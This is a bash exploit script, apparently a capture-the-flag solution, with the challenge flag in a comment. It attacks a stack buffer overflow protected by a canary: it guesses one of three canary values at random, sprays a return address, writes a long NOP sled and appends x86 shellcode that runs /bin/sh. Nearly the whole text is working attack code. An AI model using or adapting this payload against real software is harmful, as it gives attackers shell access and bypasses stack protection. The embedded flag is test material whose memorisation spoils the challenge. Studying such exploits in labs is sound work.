#!/bin/bash # flag{CANARY_IS_ALSO_AN_ISLAND} ######### Exploit ######### # Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate. # Note: Only canaries without null bytes can be used due to the use of strcpy. case $(( RANDOM % 3 )) in 0) printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70" ;; 1) printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b" ;; 2) printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08" ;; esac # Step 2: Fill the buffer with a candidate return address printf "\x10\xd6\xff\xff%.0s" {1..30} # Step 3: Write a lot of NOPs to stdout as a slide for the shellcode printf "\x90%.0s" {1..2000} # Step 4: Write the provided shellcode to stdout printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" ###########################